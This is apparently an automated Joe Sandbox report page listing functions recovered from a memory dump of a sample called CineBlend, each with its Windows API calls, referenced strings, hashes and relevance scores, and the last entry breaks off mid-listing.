Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: aab06789594bde5b21380bacbb108452d3a0ac7f0de368b2fec6f2f6168b3221
Instruction ID: b53652cce57d12f7192e56c2f61bc7c0240cb05236db317702d309d38867aa98
Opcode Fuzzy Hash: aab06789594bde5b21380bacbb108452d3a0ac7f0de368b2fec6f2f6168b3221
Instruction Fuzzy Hash: A74191712043029FDB20DF24D985F5ABFE8EF89714F1446ADF5A997291DB30E904CBA2

Function 00BC4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BCDCD0,00000000,?,?,?,?), ref: 00BC4F48
GetWindowLongW.USER32 ref: 00BC4F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BC4F75

Strings

SysTreeView32, xrefs: 00BC4F1A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 0308cf272bd74d0d11b04c8ed190ffee74c7b59354377b9272d317db0fe25ba6
Instruction ID: 05208de41001cbdbbea0f3eca17d760d98480538a4c67a550ecb4a727b495bf5
Opcode Fuzzy Hash: 0308cf272bd74d0d11b04c8ed190ffee74c7b59354377b9272d317db0fe25ba6
Instruction Fuzzy Hash: FA317A71214205AFDB218E78CC55FEA7BE9EB08334F214769F979A21E0DB70AD509B60

Function 00BB3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BB3AD4,?,?), ref: 00BB3DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00BB3AD7
_wcslen.LIBCMT ref: 00BB3AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00BB3B63

Strings

255.255.255.255, xrefs: 00BB3AF2, 00BB3AF7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: c149b3d9d77bf2a5ffad22a135de1593b47ee7d97845c54ea6d841efdb95ffe3
Instruction ID: 88b25ecc2dc0b046edce69cbfef569300cd9275d199284594b6807bf3370c36f
Opcode Fuzzy Hash: c149b3d9d77bf2a5ffad22a135de1593b47ee7d97845c54ea6d841efdb95ffe3
Instruction Fuzzy Hash: FE3181396002019FCB20CF68C5C5EB97BE1EF54718F2481D9E8168B396D7B1EE46CB60

Function 00BC4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BC49DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BC49F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00BC4A14

Strings

SysMonthCal32, xrefs: 00BC49A7

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3b52b7d5ae158b7319f90e929f5e40a150b76bbc8e3d40be6ea30ff22d5ea6f3
Instruction ID: 8024736736fae315e4c9e2f66e4c5c067bf8044511648a3d20627fce28e0c511
Opcode Fuzzy Hash: 3b52b7d5ae158b7319f90e929f5e40a150b76bbc8e3d40be6ea30ff22d5ea6f3
Instruction Fuzzy Hash: 8221A032500229ABDF118F90CC46FEB3BA5EB48714F110258FA156B090DAB1A855DB90

Function 00BC50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BC51A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BC51B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00BC51B8

Strings

msctls_updown32, xrefs: 00BC5122

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: fa7ec6bc45d5bc72dfe33f121ea837a983774c0ced7a75cb09f80423dfb27729
Instruction ID: 67133f671c5460808a0740e294437a70b6ad5c5dac88db40d64b43294f9527d7
Opcode Fuzzy Hash: fa7ec6bc45d5bc72dfe33f121ea837a983774c0ced7a75cb09f80423dfb27729
Instruction Fuzzy Hash: 1B218EB5600609AFDB10DF14CC85EAB37EDEB59364B040199FA00AB261CA30EC41CBA0

Function 00BC4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00BC42DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00BC42EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00BC4312

Strings

Listbox, xrefs: 00BC42AB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 035b5eae0de03a225a3a7c8c640b9a14ea29833de855a44fae20c8a73e81c8f8
Instruction ID: b8783cff77829184ae936c09e2633b606fe93ef9c61dfc026d485d594516e105
Opcode Fuzzy Hash: 035b5eae0de03a225a3a7c8c640b9a14ea29833de855a44fae20c8a73e81c8f8
Instruction Fuzzy Hash: 8D218032610218BBEF118F94DC85FAB3BAEEB89764F118168F9009B190CB719C51CBA0

Function 00BA5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BA544D
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BA54A1
SetErrorMode.KERNEL32(00000000,?,?,00BCDCD0), ref: 00BA5515

Strings

%lu, xrefs: 00BA54B4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: e9a042e57036ffa94f35504fa75a27be582738e73c7768c275604e2b9b859150
Instruction ID: 14d2b742cc4f67dd8486d6e6c0f57261b1a29a1e2f5f1dceb656d1201d0cb8b5
Opcode Fuzzy Hash: e9a042e57036ffa94f35504fa75a27be582738e73c7768c275604e2b9b859150
Instruction Fuzzy Hash: B0314F75A00209AFDB10DF54C885EAAB7F8EF09304F1480E9F909DB262DB71EE45DB61

Function 00BC4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BC4CED
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BC4D02
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BC4D0F

Strings

msctls_trackbar32, xrefs: 00BC4CC4

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1bb4129fd17620cb4e185571f62ff6c54798605d29a8e74eba659af7b736e0a6
Instruction ID: 1f4a1a56b57f1024fe0ca5ecac5114695b6b735c6b2b27e06d844e29eb8e427b
Opcode Fuzzy Hash: 1bb4129fd17620cb4e185571f62ff6c54798605d29a8e74eba659af7b736e0a6
Instruction Fuzzy Hash: 7B110271240248BEEF205F69CC06FAB3BE8EF89B65F120528FA51E60A0C671DC50DB20

Function 00B9389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

Part of subcall function 00B936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B93712
Part of subcall function 00B936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B93723
Part of subcall function 00B936F4: GetCurrentThreadId.KERNEL32 ref: 00B9372A
Part of subcall function 00B936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B93731

GetFocus.USER32 ref: 00B938C4

Part of subcall function 00B9373B: GetParent.USER32(00000000), ref: 00B93746

GetClassNameW.USER32(?,?,00000100), ref: 00B9390F
EnumChildWindows.USER32(?,00B93987), ref: 00B93937

Strings

%s%d, xrefs: 00B9394B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 58843a09c026f873071182122df06d2b92b621d76f37bd01626242f2004e3234
Instruction ID: 25c2dd4ad4dbc72c88d283653d1bf741e6d0946a8c7413c9c03d44a720460e3a
Opcode Fuzzy Hash: 58843a09c026f873071182122df06d2b92b621d76f37bd01626242f2004e3234
Instruction Fuzzy Hash: 3E11A2756002096BCF11BF749C85FEE77EAAF98704F0480B9F9099B292DE719A05DB30

Function 00BC6321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BC6360
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00BC638D
DrawMenuBar.USER32(?), ref: 00BC639C

Strings

0, xrefs: 00BC632E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 0c7bdaafc9cd2b0610c86d300a7ecb3dabd6c3e282a953ab23a0c2676b451433
Instruction ID: 4b36081a8ded2039ac53f1f1b36d43f733a5bf3509f6e06d046e278aca171bc8
Opcode Fuzzy Hash: 0c7bdaafc9cd2b0610c86d300a7ecb3dabd6c3e282a953ab23a0c2676b451433
Instruction Fuzzy Hash: 2B015771614258AFDB219F55DC84FAABBB4FF88351F1080E9F84AE6151DF308A85EF21

Function 00B8E778 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00B8E797
FreeLibrary.KERNEL32 ref: 00B8E7BD

Strings

X64, xrefs: 00B8E680
GetSystemWow64DirectoryW, xrefs: 00B8E791

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: c485c58f4196c2e138efd659ee3e7da2c0931623dda15dda672e672055ea0ed6
Instruction ID: ad00c012db212bcf85cd51583b3b61ec79dca2dfa742221a1f081f0bbee967cc
Opcode Fuzzy Hash: c485c58f4196c2e138efd659ee3e7da2c0931623dda15dda672e672055ea0ed6
Instruction Fuzzy Hash: 98E06D75901614AFEB65AA208C88E6A72A8AB22741B1504E8E826B71B0EB61C944CB59

Function 00B9096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a6b74850953dab03d5afc32d074895998e4f75966878434b52663618bf5d57
Instruction ID: b65585cfc8bd41f7f339ffcd44056ba11b59a1a5e437a1978de0cec542663b05
Opcode Fuzzy Hash: 34a6b74850953dab03d5afc32d074895998e4f75966878434b52663618bf5d57
Instruction Fuzzy Hash: 3FC13875A1021AEFDB04DFA4C894EAEB7B5FF48704F2085A8E505EB251D731EE81DB90

Function 00B641F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00B6427E
__alldvrm.LIBCMT ref: 00B6447F
__alldvrm.LIBCMT ref: 00B644A1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction ID: 32b8864f9591cdfdbdb116f4d5935dc2873498e1e557ddeb8b8570fa0595cae7
Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
Instruction Fuzzy Hash: 80A15772A00B869FEB21CF18C8927AEBBE5EF51314F2441EDE5999B381CB3C8941C754

Function 00B90D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BD0BD4,?), ref: 00B90EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BD0BD4,?), ref: 00B90EF8
CLSIDFromProgID.OLE32(?,?,00000000,00BCDCE0,000000FF,?,00000000,00000800,00000000,?,00BD0BD4,?), ref: 00B90F1D
_memcmp.LIBVCRUNTIME ref: 00B90F3E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: c2f456c66f250c314f4775c250e775671ee4e84180d1b5dede9a63827769ed6f
Instruction ID: 067c0e2a99fae0115f02c5714fc48444ae937a004f0841acecbc725678408af8
Opcode Fuzzy Hash: c2f456c66f250c314f4775c250e775671ee4e84180d1b5dede9a63827769ed6f
Instruction Fuzzy Hash: 2081F675A10109EFCF14DF94C984EEEB7B9FF89315F2045A8E506AB250DB71AE06CB60

Function 00BBB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00BBB10C
Process32FirstW.KERNEL32(00000000,?), ref: 00BBB11A

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Process32NextW.KERNEL32(00000000,?), ref: 00BBB1FC
CloseHandle.KERNEL32(00000000), ref: 00BBB20B

Part of subcall function 00B4E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00B74D73,?), ref: 00B4E395

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 400b3029d220032159f17422efceee9afa178cd1185f50cf240f553ae1d098b9
Instruction ID: 6d676145d2352b1410858589b64dc97d46951e1396ebfdca9d10efb0c5f2db32
Opcode Fuzzy Hash: 400b3029d220032159f17422efceee9afa178cd1185f50cf240f553ae1d098b9
Instruction Fuzzy Hash: B3513BB1908300AFD310EF24C886E6BBBE8FF88754F4049ADF59597251EB70E904CB92

Function 00B71711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B71840

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e2e759872981a5f14fb6ede579c4848573142212cbafa2f2cf738b2a98fb5967
Instruction ID: 2b25680dc433de27d8ddf5d0fbaee3cde45cd0f64af1d9ff7846b0170abe8347
Opcode Fuzzy Hash: e2e759872981a5f14fb6ede579c4848573142212cbafa2f2cf738b2a98fb5967
Instruction Fuzzy Hash: BE412671A00101AADB257FBD8C86A7E3AE9EF45730F148AE5F83CD7291DB394C019672

Function 00BB2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00BB255A
WSAGetLastError.WSOCK32 ref: 00BB2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BB25E7
WSAGetLastError.WSOCK32 ref: 00BB25F1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: b54a396a4851a1f83eb5d896d6a47a6e27d8d2a53ec8a0110812cab1b32763fd
Instruction ID: 0e786e81b5be6b386b619a55230a912db5042a0fed3ad699aa4691da53ea88a8
Opcode Fuzzy Hash: b54a396a4851a1f83eb5d896d6a47a6e27d8d2a53ec8a0110812cab1b32763fd
Instruction Fuzzy Hash: 1641C474A00200AFE720AF24C886F6A77E5EB54754F54C49CF9169F2D3D7B1ED418B91

Function 00BC6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BC6D1A
ScreenToClient.USER32(?,?), ref: 00BC6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00BC6DBA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8728b1afefecaac35b0329485ad23c95ba5cd0debf8b06bced32ddf65245a5e3
Instruction ID: 6dedd126e95b2b0f45312ff6aa9bbe1463157c80c2e1495a0ec304a5a6f3d0b3
Opcode Fuzzy Hash: 8728b1afefecaac35b0329485ad23c95ba5cd0debf8b06bced32ddf65245a5e3
Instruction Fuzzy Hash: 8451DB75A00209AFCF24DF64D884FAE7BF6EB54360F1085AEE95597290D730AD81DB50

Function 00B6B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
